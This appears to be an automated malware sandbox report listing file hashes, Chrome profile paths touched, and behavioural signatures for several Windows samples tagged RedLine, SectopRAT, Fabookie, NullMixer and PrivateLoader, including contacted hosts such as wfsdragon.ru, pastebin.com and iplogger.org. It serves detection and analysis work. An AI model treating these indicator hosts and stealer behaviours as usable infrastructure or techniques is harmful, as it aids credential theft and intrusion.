MD5 f6258be639e7e2b77cbabeea238025e3
SHA1 e9a97f9ce2e036f605305a429d04db321f52c763
SHA256 0482c64dba8267176642e7f2bfe0f38dd9a359e20b0ba967f99c5a120eba9d8c
SHA512 99af28697b71dce58ef7bd208c249f9a8e9ccca0b9173b56d7f8ef305d9b072d07264270c30d2a679b7db5beb8f54198bf7106f5d68861e1748acfa027daae9b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\d34f3d58-bc95-4333-8fb5-d410095e69ba.tmp

MD5 b284ff62d029ff02acac34c6c25bd475
SHA1 967b47b71c93c903de467d0b35d6c0e30e7fc0cb
SHA256 41b6e4e9479cfebba78cc7814cc45895873025cc585a46085620b5a7e5e7ccf1
SHA512 1cf65418e6498fc095fcc1840e68e8a9ce82a9f0e79db25aba879af7471940a4d1a5824d3a1668d8e1c1a1a69b193221aab97812bf0d0a0a659848cbd72350dd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 fb797fe07cbe3ef9eb41bd96da07bdf4
SHA1 8441bcee5386bed896628c63ed3209f2d182c55d
SHA256 7388518c6a16e8fd79767028e554aed477ba2b25d8962df213833e8542f8e681
SHA512 41a787886548c2b74a4f8e5aca9240adf3468c4040a7de15c4049d1502a9004085cb8cfb2e8e94f482e027ed8e90e6f5889304767a64b4f087e3a7ce24abc1e7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 aa444631d148f8348ea410b48f62efbe
SHA1 980c22f53c41db88a6ce0cd77419d11636c658c7
SHA256 b874d4fa7ab4a89b2ede949373d68236db2f596d308cb83fb24e4dc5eee1fa5c
SHA512 c5dd1d99148c8f47427398c67cd728b1d500da25739ee92d0d9f7ba86189f5a7089803bfc3ccc636c4c01728f21e7a5f601f3748769ec9457515963afa72839e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 efff85065215929cddcd8e16125892af
SHA1 316542a2e6ee41df36d25cbdb13ac52c4ccf55f1
SHA256 df13545e75faeda5097aed7a4eab6134a640125737df77fbf9ce2a511501d125
SHA512 a2acc5ad351c33462467ba630743281aefeb06bb1ad575d425412fc617adad4882688b6e55e14f4258cf0bf6cc7a8b898eae19616fd0aa9b73657c693691408b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 f691321c4dc929a848080bd30981fcfd
SHA1 2b391b422d8d94bfccb3e7df60d67b6b2fdbe34e
SHA256 79c0554b04415c56f5f83b7c45cc866199c904c17368a2a6edc4cbd62dfebbcc
SHA512 ee1e9c1118d1998c35b78fcd008d34eee15589bab76d72dab7c8d083660c7c5e3920fd3db8ad7fe3161a9210a377bd4ca9861dfce99073eccc787fb3617094c6

memory/4564-400-0x0000000002F10000-0x0000000002FA2000-memory.dmp

memory/4564-401-0x0000000002FB0000-0x0000000003BAB000-memory.dmp

memory/4564-402-0x0000000003BB0000-0x0000000003C3B000-memory.dmp

memory/4564-404-0x0000000003C40000-0x0000000003CC7000-memory.dmp

memory/4564-407-0x0000000003C40000-0x0000000003CC7000-memory.dmp

memory/4564-408-0x00000000007F0000-0x00000000007F1000-memory.dmp

memory/4564-409-0x0000000000800000-0x0000000000804000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 00f3396702aebf0bd5e0f444957e2112
SHA1 c63033b74c8daec7ee3aa5a875a5e01118d9c5bd
SHA256 4321758abfcd60cd4279925e2d0ee7459d8d6e2a583cf01ddbb85d4112981169
SHA512 9cb6f450af40b8196fb627fd4b150ac185cc646d4060eba0151b2735c6983151046514fd45b1da5d55dde3e04ec180ce72af2d2499693005572f7a704928a170

C:\Users\Admin\AppData\Local\Temp\93c131d9-dafb-484a-91d9-824bc130b6e8.tmp

MD5 da75bb05d10acc967eecaac040d3d733
SHA1 95c08e067df713af8992db113f7e9aec84f17181
SHA256 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2
SHA512 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1f4cfe70eba098ed27ec836eaf980dd8
SHA1 61c569997488d0439dbc4b99322cda411e539f82
SHA256 497384cae16ea4ef7cfd12335c2db7d08e21b706da1b66af9e6dd8684b167a3d
SHA512 6c1cd138b20d6e1517bc4546b318389f901e73e2160255d177f6c469e4e746a6b9230d7414fa6528bfe23a57cb22eab40abbb25335002bbd71d69e93716bc958

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

MD5 29e371398d3d4614a0c11030dfffd84f
SHA1 7176b3a0c8cb913131b59f6f58ad9803e2128c80
SHA256 ab198411eeb0772bcbb22e5ce2eb95308e8cf549704ed16a276a1696f9ea85d0
SHA512 2be829b75cf1840d6619d3f04369827e0293d292dfdde85be67a75f19677105067af06889c738308d002d230dcbf4dfc4ac4193c0bcabaa573ffdf4a7f6b121b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 ed173bb2a3bef744dadfa6727b0532b1
SHA1 50ac6aa948d892ea2eb219584e48e229d6d85e8d
SHA256 6d47288a679f6ee0d75e9b651571bff8ef29b5d46b5db2b5ee9310ed78720cb5
SHA512 ac54947b062c4e0b3c4f11bc347047f61a181c0367849b85b815704dc4611b9c6279b95efb327a6c645ef705790abf1c247b7eb711509449fd8bc9e72f6067cc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e1bcb1600f79143ab61232e96f864ed6
SHA1 090a3864e404a03fe2476d8161db764d25fdfcf0
SHA256 f4a3c10a18ead1e0bc9278e563bf33f9f0c4380786ffdf94b809e763469ba5a4
SHA512 a994a063e95d68fabe693851cbaf6140fbe79a2c6dcb4cf00a3f14e962e056792fcbf32245d0996c4c3f153af585d8d714c17f8b0d54e9c046d97db006df9591

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 749244478c54fa257976848ca9859b75
SHA1 ab733fc2587399cac24f8c844921cd24b277f189
SHA256 7cae9188be82ec7eb718a39d8d730f51ba008a4eec05f1c9ebc50a706e89b72f
SHA512 c41887a854361904d470bb6cc156499f885a50643eaea05428c70c30f4b352c15777c5f5a7a4021e99dffdb4f390495de9f14ed4be98be52eb4ff3d48cb927bd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c13c59d5cbf904ac73ded00c53f5975e
SHA1 51f4cf160a52d217790cadf82443ad525e9ca853
SHA256 39b413217055a01c375f7f0683593d76731bad28b98c760c541338b67c3f18d9
SHA512 d512ee71e3993d29493da10c1687e83ab8cdcc5fe3384131880c32619988fc9e2e63e1c95982ecb11292f4a04a3636f4bbd1e45f051f8bf1176464de96a8b1b1

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe

"C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.gogamec.com udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0944361c3621a67a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09d761ab4704dd931.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09d761ab4704dd931.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
